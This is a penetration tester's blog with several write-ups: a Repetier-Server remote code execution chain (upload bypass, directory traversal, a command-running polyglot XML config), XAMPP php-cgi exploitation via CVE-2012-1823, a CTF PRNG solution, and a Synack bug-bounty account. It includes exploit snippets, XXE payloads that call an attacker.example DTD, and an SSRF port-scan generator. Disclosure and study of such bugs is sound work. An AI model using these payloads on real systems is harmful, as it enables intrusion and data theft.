The first file write opportunity I found was in the custom watermark upload feature in the "Global Settings -> Timelapse" menu. Process Monitor shows the RepetierServer process writes the file to "C:\ProgramData\Repetier-Server\database\watermark.png". I had to tweak my Process Monitor filters because the file is first written to a temp file called upload1.bin and then renamed to watermark.png.

If you attempt to upload a file with an extension other than ".png", you will get a "Wrong file format" error. I opened up Burp to take a look at the HTTP request and see if modifying it in transit would bypass this check. Oftentimes developers make the mistake of only performing security checks client-side in JavaScript, which can be easily bypassed by sending the request directly.

Manually manipulating each of the fields, I found a couple of interesting results. It appears the only security check performed server-side is a file extension check on the filename field of the request form. This check isn't really necessary since the destination file on disk is constant. However, I did find that the file content can be whatever I want. The web application also provides another endpoint that allows retrieval of the watermark file. While this isn't immediately useful, it means that if I can write arbitrary data to the watermark file location, I can read it back remotely. I'll save this away for later in case I need it.
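A rough sketch of abusing that check: keep a ".png" filename in the multipart form while smuggling arbitrary bytes as the content. The form field name and boundary handling here are assumptions, not Repetier-Server's actual request format:

```python
import uuid

def watermark_upload_body(data: bytes):
    """Build a multipart body that passes the server's only check:
    the *filename* must end in .png; the bytes are never validated."""
    boundary = uuid.uuid4().hex
    head = ("--{b}\r\n"
            'Content-Disposition: form-data; name="file"; filename="watermark.png"\r\n'
            "Content-Type: image/png\r\n"
            "\r\n").format(b=boundary)
    tail = "\r\n--{b}--\r\n".format(b=boundary)
    content_type = "multipart/form-data; boundary=" + boundary
    return content_type, head.encode() + data + tail.encode()
```

POSTing such a body to the watermark endpoint would plant arbitrary data at a known, remotely readable path.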

Bug 2 – File Upload – Uncontrolled Content – Partially Controlled PATH (Directory Traversal), Controlled File Name, Uncontrolled Extension

Continuing with my mission of identifying file upload possibilities, I started to investigate the flow for adding a new printer to be managed by the web application. The printer creation wizard is pretty straightforward. The following video demonstrates how to create a fake printer on a Windows host running in VMware Workstation.

Based on the Process Monitor output, it appears that when a new printer is created, an XML file named after the printer is created in the "C:\ProgramData\Repetier-Server\configs" directory, as well as a matching directory under "C:\ProgramData\Repetier-Server\printer" with additional subdirectories and files.

Attempting to identify the request responsible for creating the new printer in Burp proved elusive at first until I figured out that the web application utilizes websockets for much of the communication to the server. After some trial and error I identified the websocket request that creates the printer configuration file on disk.

From here I began modifying the different fields of the request to see what interesting effects might happen. Since the configuration file name mirrored the printer name, the first thing I tried was prepending a directory traversal string to the printer name in the websocket request to see if I could alter the path. Given my goal of creating an external command configuration file, I named my printer "..\\database\\extcommands". To my surprise, it worked!!

At this point I could write to the file location necessary to load an external command, getting me substantially closer to full remote code execution. However, I still could not control the file contents. I decided to go ahead and script up a quick POC to reliably exploit the vulnerability and move on.
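To see why the traversal works, consider how the server presumably builds the config path from the printer name. The websocket message shape below is a guess; the configs directory comes from the Process Monitor output above:

```python
import json
import ntpath

CONFIG_DIR = r"C:\ProgramData\Repetier-Server\configs"

def create_printer_msg(name):
    # guessed shape of the printer-creation websocket message
    return json.dumps({"action": "createPrinter", "data": {"name": name}})

def resulting_config_path(name):
    # the server appears to write "<configs>\<printer name>.xml";
    # a traversal sequence in the name walks out of the configs directory
    return ntpath.normpath(ntpath.join(CONFIG_DIR, name + ".xml"))
```

Naming the printer "..\\database\\extcommands" therefore lands the file exactly where the external command config is loaded from.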

Bug 3 – File Upload & Download – Partially Controlled Content – Uncontrolled PATH – Insufficient Validation

Starting from where I left off with the directory traversal bug, I began investigating ways I could try and modify the printer configuration file that I had written as the external configuration file. Luckily for me, the web application provided a feature for downloading the current configuration file or replacing it with a new one.

Coming off the high from my last bug, I figured why not just try to use this feature to upload the external command configuration file for the win. Nope… still more work to do.

Since both files were XML, I began trying different combinations of elements from each configuration file to try and satisfy whatever validation checks were happening. After spending a fair amount of time on this, I just decided to open the binary up in IDA Pro and look for myself. Rather than bore you with disassembly and the tedium that followed, I'll skip right to the end. Because neither parser fully validated every element of its file, a single XML file could be constructed that passed validation for both, simply by including the elements each parser checked for. This meant I was able to use the "Replace Printer Configuration" feature to add an external command to the extcommands.xml file.
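To make the trick concrete, here is a sketch of such a dual-purpose file; the element names are illustrative guesses, not Repetier-Server's actual schema:

```xml
<!-- hypothetical polyglot: carries the elements the printer-config parser
     checks AND the elements the external-command parser checks -->
<config>
  <general name="extcommands"/>   <!-- satisfies the printer-config checks -->
  <extcommand>                    <!-- satisfies the extcommands checks -->
    <name>pwn</name>
    <execute>cmd /c whoami</execute>
  </extcommand>
</config>
```

Each parser ignores the elements it doesn't know about, so one document validates as both file types.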

Bug 4 (BONUS) – Remote File System Enumeration

Digging further into the web application, I also discovered an interesting "feature" located in the "Global Settings -> Folders" menu. The web application allows a user to add a registered folder to import files for 3D printing. The first thing I noticed about this feature is that it is not constrained to a particular folder and can be used to navigate the folder structure of the entire target file system. This can be achieved by simply clicking the "Browse" button.

Since this feature references the ability to print from locations on disk, I decided to investigate further by creating a Folder at C:\ and seeing if I could find where the Folder is referenced. After creating a printer and selecting it from the main page, a menu can be selected that looks like a triangle in the top right of the page.

When I select the Folder the following window is displayed. If I deselect the “Filter Wrong File Types” checkbox, the dialog basically becomes a remote file browser for the system. The great thing about this feature from an attacker’s perspective is it gives me the ability to confirm exploitation of the directory traversal file upload vulnerability identified earlier.

Exploitation

Using the vulnerabilities discovered above, I mapped out the different stages of the exploit chain that needed to be implemented. The only piece that I lacked was the ability to remotely restart the RepetierServer service or the system. Since the target system was a user's workstation, I would just have to hope that they would reboot the system at some point in the near future. This also meant that replacing the external command would be impractical, since it required a service restart each time. I would need to ensure that whatever external command I created was reliable and flexible enough to support the execution of subsequent system commands. Fortunately for me, I had just the bug for this: I could use the watermark file upload & download vulnerability as a medium for storing the commands I wanted to execute and the resulting output. The following external command achieves this goal by reading from the watermark file, executing its contents, and then piping the output to the watermark file.
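As a sketch of what such an external command could look like (the tag names and temp path are illustrative assumptions; only the watermark path comes from Bug 1):

```xml
<extcommand>
  <name>wm-shell</name>
  <!-- 1) copy the uploaded "watermark" (really a batch file) somewhere
       runnable, 2) execute it, 3) write its output back over the
       watermark file so it can be fetched remotely -->
  <execute>cmd /c copy /y C:\ProgramData\Repetier-Server\database\watermark.png %TEMP%\wm.bat &amp; %TEMP%\wm.bat &gt; C:\ProgramData\Repetier-Server\database\watermark.png 2&gt;&amp;1</execute>
</extcommand>
```

With this in place, each round trip is just: upload commands as the watermark, trigger the external command, download the watermark again for the output.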


Putting this all together, I came up with the following exploit flow that needed to be implemented.

I implemented each step in this python POC. The following video demonstrates it in action against my test RepetierServer installation.

After successfully testing the POC, I executed it against the target server on the customer’s network. It took ~3 days until the system was rebooted, but I was ultimately able to remotely compromise the target. When the penetration test was complete, I reached out to the vendor to report the vulnerabilities and they were quick to patch the software and release an update. I also coordinated the findings with MITRE and two CVEs were issued, CVE-2019-14450 & CVE-2019-14451.

403 to RCE in XAMPP


Some of the best advice I was ever given on how to become more successful at vulnerability discovery is to always try to dig a little deeper. Whether you are a penetration tester, red teamer, or bug bounty hunter, this advice has always proven true. Far too often it is easy to become reliant on the latest "hacker" toolsets and other people's exploits or research. When those fail, we often just move on to the next low-hanging fruit rather than digging in.

On a recent assessment, I was performing my usual network recon and came across the following webpage while reviewing the website screenshots I had taken.

The page displayed a list of significantly outdated software running behind this webserver. Having installed XAMPP before, I was also familiar with the very manual and tedious process of updating each of the embedded services bundled with it. My first step was to try and enumerate any web applications being hosted on the webserver. My current tool of choice is dirsearch, mainly because I've gotten used to its syntax and haven't found a need for anything better.

After having zero success enumerating any endpoints on the webserver, I decided to set up my own XAMPP installation mirroring the target system. The download page for XAMPP can be found here. It has versions dating all the way back to 2003. From the 403 error page, we can piece together what we need to download the right version of XAMPP. We know it's a Windows install (Win32). If we look up the release date for the listed PHP version, we can see it was released in 2011.

Based on the release date, we can reliably narrow it down to a couple of candidate XAMPP installations.

After installing the software, I navigated to the Apache configuration file directory to see what files were being served by default. The default configuration is pretty standard, with the root directory being served out of C:\xampp\htdocs. What grabbed my attention were the "supplemental configurations" included at the bottom of the file.

The main things to pay attention to in these configuration files are the lines that start with ScriptAlias, as they map a directory on disk to one reachable from the web server. Only two show up: /cgi-bin/ and /php-cgi/. What is this php-cgi.exe? This seems awfully interesting…

After a few searches on Google, it seems the php-cgi binary has the ability to execute PHP code directly. I stumbled across an exploit that lists the target's version as vulnerable, but it targets Linux instead of Windows. Since PHP is cross-platform, I could only assume the Windows version is also affected. The exploit identifies the vulnerability as CVE-2012-1823.

Did I hit the jackpot??? Did XAMPP slide under the radar as being affected by this bug when it was disclosed? With this CVE in hand, I googled a little bit more and found an article by Praetorian that mentions the same php-cgi binary and conveniently includes a Metasploit module for exploiting it. Loading it up in Metasploit, I changed the TARGETURI to /php-cgi/php-cgi.exe and let it fly. To my surprise: remote code execution as SYSTEM.
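The bug class is worth sketching. When php-cgi is exposed directly, a query string containing no unencoded "=" is handed to the binary as command-line switches, so two -d flags are enough to make it evaluate the POST body as PHP. A sketch of the classic request shape (the base URL and command here are placeholders, not the engagement's):

```python
from urllib.parse import quote

def cve_2012_1823_request(base, cmd):
    """Build the classic php-cgi argument-injection request (CVE-2012-1823)."""
    # the query string must contain no bare '=' or php-cgi treats it as a
    # normal query instead of argv; quote() percent-encodes them for us
    args = quote("-d allow_url_include=On -d auto_prepend_file=php://input")
    url = base + "?" + args
    body = "<?php system('%s'); ?>" % cmd   # executed via auto_prepend_file
    return url, body
```

The Metasploit module referenced above automates exactly this style of request.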

Bugs like this remind me to always keep an eye out for frameworks and software packages that are collections of other software libraries and services. XAMPP is a prime example because it has no built-in update mechanism and requires manual updates. Hopefully examples like this will help encourage others to always dig a little deeper on interesting targets.

Defcon 2020 Red Team Village CTF – Seeding Part 1 & 2


Last month was Defcon, and with it came the usual rounds of competitions and CTFs. With work and family, I didn't have a ton of time to dedicate to the Defcon CTF, so I decided to check out the Red Team Village CTF. The challenges for the qualifier ranged pretty significantly in difficulty as well as category, but a couple of challenges kept me grinding. The first was fuzzing a custom C2 server to retrieve a crash dump, which I could never get to crash (feel free to leave comments about the solution). The second was a two-part challenge called "Seeding" in the programming category, which this post is about.

Connecting to the challenge service returns the following instructions:

We are also provided with the following code snippet from the server that shows how the random string is generated and how the PRNG is seeded.

The challenge seemed pretty straightforward. With the given seed and code for generating the random string, we should be able to recover the key given enough examples. The thing that made this challenge a little different than other "seed" based crypto challenges I've seen is that the string is constructed using random.choice() over the key rather than just generating numbers. A little tinkering with my solution script showed that the sequence of characters generated by random.choice() varies based on the length of the parameter provided, a.k.a. the key.

This means the first objective we have is to determine the length of the key. We can pretty easily determine the minimum key length by finding the complete keyspace, sampling outputs from the service until we stop getting new characters in the oracle's output. However, this does not account for multiples of the same character in the key. So how do we get the full length of the key? We have to leverage the determinism of the sequence generated by random. If we relate random.choice() to random.randint(), we see they are actually very similar, except that random.choice() just maps the next number in the random sequence to an index in the string. This means if we select a key with unique characters, we should be able to identify the sequence generated by the PRNG by noting the indexes of the generated random characters in the key. It also means these indexes, or key positions, should be consistent across keys of the same length with the same seed.

Applying this logic we create a key index map using our custom key and then apply it to the sample fourth iteration string provided by the server to reveal the positions of each character in the unknown key. Assuming the key is longer than our keyspace, we will replace any unknown characters with “_” until we deduce them from each sample string.
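In code, that mapping step looks roughly like this; rand_string is a stand-in for the server's (unseen) generator, and the index behavior assumes Python 3's random.choice:

```python
import random

def rand_string(key, seed, n=30):
    """Stand-in for the server's generator: seed, then choose from the key."""
    random.seed(seed)
    return ''.join(random.choice(key) for _ in range(n))

SEED = 1234
probe = "0123456789"            # local key: 10 unique characters
out = rand_string(probe, SEED)
index_map = [probe.index(c) for c in out]   # the PRNG's index sequence

# same seed + same key length => same index sequence, so the map reads
# characters out of a key we don't know
secret = "kZ3m9QxW1p"           # pretend this is the server's key
leak = rand_string(secret, SEED)
derived = ['_'] * len(secret)
for i, c in zip(index_map, leak):
    derived[i] = c
```

Positions the PRNG never selects stay as "_" until further samples fill them in.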

Now we have the ability to derive a candidate key based on the indexes we’ve mapped given our key and the provided seed. Unfortunately this alone doesn’t bring us any closer to determining the unknown key length. What happens if we change the seed? If we change the seed we get a different set of indexes and a different sampling of key characters.

In the example above, you’ll notice that no characters in our derived keys conflict. This is because we know that the key length is 10, since we generated it. What happens if we try to derive a candidate key that is not 10 characters long using the generated 4th iteration random string from a 10 character key?

It appears if the length of the key used to generate the random string is not the same length as our local key, then characters in our derived keys do not match for each index. This is great news because that means we can find the server key length by incrementing our key length from the length of our key space until our derived keys don’t conflict.
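That length-detection loop can be sketched as follows, again with rand_string standing in for the server and Python 3 semantics assumed:

```python
import random

def rand_string(key, seed, n=40):
    # stand-in for the challenge server's generator
    random.seed(seed)
    return ''.join(random.choice(key) for _ in range(n))

def derive(length, seed, leak):
    """Map a leaked string onto key positions for a guessed key length."""
    probe = ''.join(chr(33 + i) for i in range(length))   # unique characters
    idx = [probe.index(c) for c in rand_string(probe, seed, len(leak))]
    key, consistent = ['_'] * length, True
    for i, c in zip(idx, leak):
        if key[i] not in ('_', c):
            consistent = False   # same position claimed by two different chars
        key[i] = c
    return key, consistent

def find_key_length(seeds, oracle, lo, hi):
    # the true length is the only one whose derivations never conflict
    for length in range(lo, hi + 1):
        if all(derive(length, s, oracle(s))[1] for s in seeds):
            return length
```

In practice the lower bound `lo` would be the size of the keyspace observed from the oracle.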

Unfortunately, this is where I got stumped during the CTF. When I looped through the different key lengths, I never got matching derived keys for the server key. After poring over my code for several hours, I finally gave up and moved on to other challenges. After the CTF was over, I reached out to the challenge creator, and he confirmed my approach was the right one. He was also kind enough to provide me with the challenge source code so I could troubleshoot my code. Executing the Python challenge server and running my solution code yielded the following output.

So what gives??? Now it works??? I chalked it up to some coding mistake I must have magically fixed and decided to go ahead and finish out the solution. The next step was to derive the full server key by sampling the random output strings from different seeds. I simply added a loop around my previous code with an exit condition for when there are no more underscores ("_") in the key array. Unfortunately, when I submitted the key, I got a socket error instead of the flag.

Taking a look at the server code, I see the author already added debugging that I can use to troubleshoot the issue. The logs show a familiar Python 3 error regarding string encoding/decoding.

Well that’s an easy fix. I’ll just run the server with python3 and we’ll be back in business. To my surprise re-running my script displays the following.

This challenge just doesn't want to be solved. Why don't my derived keys match up anymore? This feels familiar. Is it possible that different versions of Python affect the sequences produced by random for the same seed?

Well, there ya have it. Depending on the version of Python you are running, you will get different outputs from random for the same seed. I'm going to assume this wasn't intentional. Either that or the author wanted to inflict some pain on all of us late adopters 🙂 Finishing up the solution and running the server and solution code with python3 finally gave me the flags.
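The divergence is easy to demonstrate without installing two interpreters: Python 2's choice() consumed the Mersenne Twister stream differently than Python 3's, so the same seed yields different picks. Emulating the old behavior inside Python 3:

```python
import random

KEY = "abcdefghij"

def choice_py3(seed, n=20):
    random.seed(seed)
    # CPython 3: choice() -> _randbelow() -> getrandbits()
    return ''.join(random.choice(KEY) for _ in range(n))

def choice_py2_style(seed, n=20):
    random.seed(seed)
    # CPython 2: choice() was seq[int(random() * len(seq))]
    return ''.join(KEY[int(random.random() * len(KEY))] for _ in range(n))
```

Integer seeds initialize the generator identically across versions; it's the per-call consumption of the stream that differs, so the two sequences drift apart.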

Even with all of the frustration I’d say it was a very satisfying challenge and I learned something new. Feel free to download the challenge and give it a go. Shout outs to @RedTeamVillage_, @nopresearcher, and @pwnEIP for hosting the CTF and especially the challenge creator @waldoirc.

Synack – Red Vs Fed Competition 2020

Preface

Obligatory statement: This blog post is in no way affiliated, sponsored, or endorsed with/by Synack, Inc. All graphics are being displayed under fair use for the purposes of this article.

Over the last few months, Synack has been running a user-engagement-based competition called Red vs Fed. As the name suggests, the competition focused on penetration testing Synack's federal customers. For those of you unfamiliar with Synack, it is a crowd-sourced hacking platform with a bug bounty type payment system. Hackers (consultants) are recruited from all over the planet to perform penetration testing services through Synack's VPN-based platform. Some of the key differences marketed between Synack and other bounty platforms are a defined payout schedule based on vulnerability type and a 48-hour triage time.

Red Vs Fed

This section is going to be a general overview of my experience participating in my first hacking competition with Synack, Red vs Fed. At times it may come off as a diatribe, so feel free to jump forward to the technical notes that follow. In order for any of this to make sense, we first have to start with the competition rules and scoring. Points were awarded per "accepted" vulnerability based on the CVSS score determined by Synack on a scale of 1-10. There were also additional multipliers once you passed a certain number of accepted bugs. The important detail here is the word "accepted", which means a submission has to survive the myriad of exceptions, loopholes, and flat-out dismissals as it goes through the Synack triage process. The information behind all of these "rules" is scattered across various help pages accessible to red team members. Examples of some of these written, unwritten, and observed rules that will be referenced in this section:

  1. Shared code: If a report falls within about 10 different permutations of what may be guessed as shared code/same root issue, the report will be accepted at a substantially discounted payout or forced to be combined into a single report.
  2. 24 hour rule: In the first 24 hours of a new listing, any duplicate reports will be compared by triage staff and they will choose which report they feel has the highest “quality“. This is by far the most controversial and abused “feature” as it has led to report stuffing, favoritism, and even rewards given after clear violation of the Rules of Engagement.
  3. Customer rejected: Even though vulnerability acceptance and triage is marketed as being performed internally by Synack experts within 48 hours, some reports may randomly be sent to the customer for a rejection determination.
  4. Low Impact: Depending on the listing type, age of the listing, or individual triage staff, some bugs will be marked as low impact and rejected. This rule is specific to bugs that seem to be somewhat randomly accepted on targets even though they all fall into the low impact category.
  5. Dynamic Out-of-Scope: Bug types, domains, and entire targets can be taken out of scope abruptly depending on report volume. There are loopholes to this rule if you happen to find load balancers or CNAME records for the same domain targets.
  6. Target Analytics: This is a feature not a rule but it seemed fitting for this list. When a vulnerability is accepted by Synack on a target, details like the bug type and location are released to all currently enrolled on the target.

About a month into the competition, I was performing some rudimentary endpoint discovery (dirsearch, Burp Intruder) on one of the legacy competition targets and had a breakthrough. I got a hit on a new virtual host on a server in the target scope, i.e. a new web application. When I come across a new application, one of the first things I do is tune my wordlist for the next round of endpoint enumeration. I do this using endpoints defined in the page source, included JavaScript files, and identification of common naming patterns, e.g. prefix_word_suffix.ext. On the next round of enumeration, I hit the error page below.
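That tuning step can be sketched as: harvest name fragments from known endpoints, then recombine them with common separators and extensions. The delimiter and extension sets below are my assumptions, not a fixed recipe:

```python
import itertools
import re

def tune_wordlist(known_endpoints, exts=(".php", ".asp", ".jsp")):
    """Split observed endpoint names on common delimiters and recombine
    the fragments into new prefix_word_suffix.ext style candidates."""
    parts = set()
    for ep in known_endpoints:
        name = ep.rsplit(".", 1)[0]                     # drop the extension
        parts.update(p for p in re.split(r"[_\-]", name) if p)
    cands = set()
    for a, b in itertools.permutations(sorted(parts), 2):
        for sep in ("_", "-"):
            for ext in exts:
                cands.add(a + sep + b + ext)
    return sorted(cands)
```

Feeding the result back into dirsearch is what turned up the error page below.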

A bug hunter can't ask for an easier SQL injection vulnerability: verbose error messages containing the actual SQL query with database names, table names, and column names. I whipped up a POC (discussed further down) and started putting together a report for the bug. After a little more recon, I was able to uncover and report a handful of additional SQLi vulns over the next couple of days. While continuing to discover and "prove" SQLi on more endpoints, I was first introduced to (5) as the entire domain was taken out of scope for SQLi. No worries, at least my bugs were submitted, so no one else should be able to swoop in and clean up my leftovers. Well, not exactly. It just so happened that there was a load balancer in front of my target as well as a defined CNAME (alias) for my domain. This meant that, thanks to (6), another competitor saw my bugs, knew about this loophole, and was able to submit an additional 5 SQLi on the aliased domain before another dynamic OOS was issued.

At this point, the race was on to report as many vulnerabilities as possible on this new web application now that my discovery was public to the rest of the competitors via analytics. I managed to get in a pretty wide range of vulnerabilities on the target, but they were split pretty evenly with the individual already in second place, putting him into first. With this web application pretty well picked through, I began looking for additional vhosts on new subdomains in hopes of finding similarly vulnerable applications. Given my last outcome, I also began to strategize about how best to time and group my submissions, realizing these nuances could be the difference between other competitors scooping them up, Synack taking them out of scope, or reports being forced to be combined.

A couple of weeks later, I caught a lucky break. I came across a couple more web applications on a different subdomain that appeared to be using the same web technologies as my previous find, and hopefully similarly buggy code. As I started enumerating the targets, the bugs started stacking up. This time I took a different approach. Knowing that as soon as my reports hit analytics it would be a feeding frenzy amongst the other competitors, I began queuing up reports but not submitting them. After I had exhausted all the bugs I could find, I began to submit the reports in chunks: sized just under what I expected would trigger Synack to issue a vulnerability-class OOS, but in small enough windows that other competitors hopefully wouldn't be able to beat me to submission by watching analytics. Thankfully, I was able to slip in all of the reports just before the entire parent domain was taken OOS by Synack.

Back to the grind… After the last barrage of vulnerability submissions, I had managed to get dozens of websites taken out of scope, so I had to set my sights on a new target. Luckily, I had positioned myself in first place after all of the reports had been triaged.

Nothing new here, lots of recon and endpoint enumeration. I began brute-forcing vhosts on domains that were shown to host multiple web applications in an attempt to find new ones. After some time I stumbled across a new web application on a new vhost. This application appeared to have functionality broken out into 3 distinct groupings. Similar to my previous finds I came across various bug types related to access control issues, PII disclosure, and unauthorized data modification. I followed my last approach and began to line-up submissions until I had finished assessing the web application. I then began to stagger the submissions based on the groupings I had identified.

Unfortunately, things didn't go as well this time. Triage started dragging on, and I got nervous I wouldn't be able to get all of my reports in before the target was put out of scope, so I decided to go ahead and submit everything. This was a mistake. When the second group of reports hit, the triage team decided all 6 of them stemmed from a single access control issue. They accepted a couple as (1) shared code for a 10% payout, then pushed back a couple more to be combined into one report. I pleaded my case to more than one of the triage team members but was overruled. After it was all said and done, they distilled dozens of vulnerabilities across more than 20 endpoints into 2 reports that would count toward the competition and then put the domain OOS (5). Oh well… I was already in first, so I probably shouldn't make a big stink, right?

Over the next month, it would seem I was introduced to pretty much every way reports could be rejected unless they were a clear CVSS 10 (this is obviously an exaggeration, but these bug types are regularly accepted on the platform).

1.   User account state modification (Self Activation/Auth Bypass, Arbitrary Account Lockout) – initially rejected, appealed it and got it accepted

2.   PII Disclosure – Rejected as  (3). Claimed as customer won’t fix

3.   User Login Enumeration on target with NIST SP 800-53 requirement – Rejected as  (3) and (4) – Even though a email submission captcha bypass was accepted on the same target… Really???

4.   Phpinfo page – Rejected as (4), even though these are occasionally accepted on web targets

5.   Auth Bypass/Access Control issue – An endpoint behind a site’s login portal allowed live viewing of CC feeds – Rejected as (4) with the following

6.   Unauthenticated, on-demand reboot of a network protection device – Rejected as (3), even though the exact same vulnerability had been accepted on a previous listing literally 2 days prior, with points awarded toward the competition. The dialog I had with the organizer about the issue is below:

At this point it really started to feel like I was fighting an unwinnable battle against the Synack triage team. 6 of my last 8 submissions had been rejected for one reason or another, and the other 2 I had to fight for. Luckily, the competition would be over shortly, and there were very few viable targets eligible for the competition. With 2 days remaining in the competition, I was still winning by a couple of bugs.

I wish I could say everything ended uneventfully 2 days later, but what good Synack sob story doesn’t talk about the infamous 24 hour rule (2)? To make things interesting, a web target was released roughly 2 days before the end of the competition. I mention “web” because the acceptance criteria for “low impact” (4) bugs are typically relaxed for these assessment types, which meant it could really shake up the scoreboard. Well, here we go…

I approached the last target like a CTF: only 48 more hours to hopefully secure the win. Ironically, the last target had a bit of a CTF feel to it. After navigating the application a little, it became obvious that the target was a test environment that had already undergone similar pentests. It was littered with persistent XSS payloads that had been dropped over a year prior. These “former” bugs served as red herrings, as the application was no longer vulnerable to them even though the payloads persisted. I presume they also served as a time suck for many, since under the 24 hour rule (1) any red teamer could win the bug if their report was deemed the “best” submission. Unfortunately, only a few hours into the test the target became very unstable. The server didn’t go down, but it became nearly impossible to log in to, regularly returning an unavailable message as if it were being DoS-ed. Rather than continue to fight with it, I hit the sack with hopes that it would be up in the morning.

First thing in the morning I was back on it. With only 12 hours left in the 24 hour rule (or so I thought), I needed to get some bugs submitted. I came across an arbitrary file upload with a preview function that looked buggy.

The file preview endpoint took arguments that specified the filename and mimetype. Modifying these parameters changed the response’s Content-Type and Content-Disposition headers (the latter controls whether the response is displayed inline or downloaded).
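As a sketch of the issue (the endpoint path and parameter names here are placeholders I made up, not the application’s real ones), re-labeling an uploaded HTML payload so the browser renders it inline is what turns the upload into persistent XSS:

```python
from urllib.parse import urlencode

BASE = "https://target.example/files/preview"  # placeholder endpoint

def preview_url(file_id: str, filename: str, mimetype: str) -> str:
    """The server reflects `mimetype` into the Content-Type header and
    derives Content-Disposition (inline vs. attachment) from `filename`,
    so both response headers are attacker-controlled."""
    return BASE + "?" + urlencode(
        {"id": file_id, "name": filename, "type": mimetype}
    )

# Force an uploaded payload to be served inline as HTML
url = preview_url("1337", "report.html", "text/html")
```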

I got the vulnerability written up and submitted before the end of the 24 hour rule. Since persistent XSS has a higher payout and higher CVSS score on Synack, I chose that vulnerability type rather than arbitrary file upload. Several hours after my submission, an announcement was made that, due to the unavailability of the application the previous night (possible DoS), the 24 hour rule would be extended 12 hours. Well, that sucks… it meant I would now be competing with more reports, possibly of better quality, for the bug I had just submitted. Time to go look for more bugs and hopefully balance it out.

After some more trolling around, I found an endpoint that imported records into a database using a custom XML format. Features like this are prime candidates for XXE vulnerabilities. After some testing, I found it was indeed vulnerable to blind XXE. XXE bugs are very interesting because of the various exploit primitives they can provide. Depending on the XML parser implementation, the application configuration, the system platform, and network connectivity, these bugs can be used for arbitrary file read, SSRF, and even RCE. The most effective way to exploit an XXE is with the XML specification for the object being parsed. Unfortunately for me, the documentation for the XML file format I was attacking was behind a login page that was out of scope. I admit I probably spent too much time on this bug, as the red teamer in me wanted RCE. I could get it to download my DTD file and open files, but I couldn’t get it to leak the data.
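A sketch of what the blind probe looks like. The import endpoint’s record format and my out-of-band host are placeholders; the external xxe.dtd would hold the parameter entities that try to read a file and call back with its contents.

```python
ATTACKER = "http://attacker.example"  # placeholder out-of-band host

def xxe_import_doc(record_xml: str) -> str:
    """Wrap a custom-format import record in a DOCTYPE that pulls an
    external parameter-entity DTD. A vulnerable parser fetches xxe.dtd,
    which confirms blind XXE even before any data comes back."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE import [\n"
        f'  <!ENTITY % ext SYSTEM "{ATTACKER}/xxe.dtd">\n'
        "  %ext;\n"
        "]>\n"
        f"<import>{record_xml}</import>"
    )
```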

Since I couldn’t get LFI working, I used the XXE to perform a port scan of the internal server, to at least ensure I could submit the bug as SSRF. I plugged the payload into Burp Intruder and set it on its way to enumerate the open ports.
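The Intruder run amounts to generating one probe per port, with open and closed ports distinguished by the parser’s error message or response time. The internal host and port list below are illustrative:

```python
def ssrf_probe(host: str, port: int) -> str:
    """One blind-XXE request per port: resolving the external entity
    makes the server connect to host:port on our behalf."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE scan [ <!ENTITY probe SYSTEM "http://{host}:{port}/"> ]>\n'
        "<import>&probe;</import>"
    )

# Feed these to Burp Intruder (or a loop) and compare error text and
# latency per port to separate open from closed.
payloads = {p: ssrf_probe("127.0.0.1", p) for p in (21, 22, 80, 443, 8080)}
```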

After I got the report written up as SSRF, I held off on submission in hopes I could get the arbitrary file read (LFI) to work and maybe pull off remote code execution. Unfortunately, about this time the server started to get unstable again. For the second night in a row, it appeared as if someone was DoS-ing the target, and it wavered between crawling and unavailable. Again I decided to go to bed, hoping it would be usable by morning.

Bright and early I got back to it: only 18 hours left in the competition, and the target was up, albeit slow. I spent a couple more hours on my XXE but made no real progress. I decided to go ahead and submit before the extended 24 hour rule expired, to at least preserve a chance at a “best” report award. Unsurprisingly, a couple hours later the 24 hour rule was extended again (because of the DoS), with it now ending shortly before the end of the competition. On this announcement, I decided I was done. While the reason behind the extension made sense, it could effectively put the results of the competition in the hands of the triage team, since they arbitrarily chose the best report among duplicated submissions.

The competition ended and we awaited the results. Based on analytics and my report numbers, I determined that the bug submission count on the new target was pretty low. As the bugs started to roll in, this theory was confirmed: there were roughly 8 or so reports after accounting for combined endpoints. My XXE was awarded as a unique finding, and my persistent XSS got duped under the 24 hour rule that had been extended to 48. Shocking: extra time leads to better reports. Based on the scoreboard, the person in second must have scored every other bug on the board except 1, nearly all reflected XSS. For those familiar with Synack, this would actually be quite a feat, because XSS is typically the most duped bug on the platform, meaning they likely won best report for several other collisions. I’d like to say good game, but it certainly didn’t feel like it.

Technical Notes of Interest

The techniques used to discover and exploit most of the vulnerabilities I found are not new. That said, I did learn a few new tricks and wrote a couple new scripts that seemed worth sharing.

  • SQL Injection

SQL injection bugs were my most prevalent find in the competition. Unlike other bug bounty platforms, Synack typically requires full exploitation of a vulnerability for full payout. With SQL injection, database names, columns, tables, and table dumps are typically requested to “prove” exploitation, rather than basic injection tests or SQL errors. While I was able to get some easy wins with sqlmap on several of the endpoints, some of the more complex queries required custom scripts to dump data from the databases. This necessity produced the two new POCs described below.

In my experience, a large percentage of modern SQL injection bugs are blind. By blind, I’m referring to SQLi bugs that do not return data from the database in the request response. That said, there are also different kinds of blind SQLi: bugs that return error messages and those that do not (completely blind). The first POC is an example of an HTTP GET, time-based boolean exploit for a completely blind SQL injection vulnerability on an Oracle database. The main difference between this POC and previous examples in my GitHub repository is the following SQL query.


The returned table has two columns of type string, and the query performs a boolean test against a supplied character limit; if the test passes, the database sleeps for the specified timeout. The response time is then measured to recover the result of the boolean test.

The second POC is an example of an HTTP GET, error-based boolean exploit for a partially blind SQL injection vulnerability on an Oracle database. This POC targets a vulnerability that can be forced to produce two different error messages.


The error message used for the boolean test is forced by the payload in the event that the “UTL_INADDR.get_host_name” function is disabled on the target system. Both POCs extract strings from the database one character at a time using the binary search algorithm below.

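The algorithm listing did not survive either, but it is simple enough to reconstruct. Here `test` stands in for either POC’s boolean oracle:

```python
def extract_char(test, low=32, high=126):
    """Recover one character code with a greater-than oracle.

    `test(limit)` must return True when the target character's ASCII
    code is strictly greater than `limit` -- the same contract as the
    boolean tests in both SQLi POCs."""
    while low < high:
        mid = (low + high) // 2
        if test(mid):
            low = mid + 1   # character code is above mid
        else:
            high = mid      # character code is mid or below
    return chr(low)

def extract_string(test_at, length):
    """Pull `length` characters; 1-indexed to match Oracle's SUBSTR."""
    return "".join(
        extract_char(lambda limit, i=i: test_at(i, limit))
        for i in range(1, length + 1)
    )
```

Over the printable ASCII range this needs at most 7 oracle queries per character.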
  • Remote Code Execution (Unrestricted File Upload)

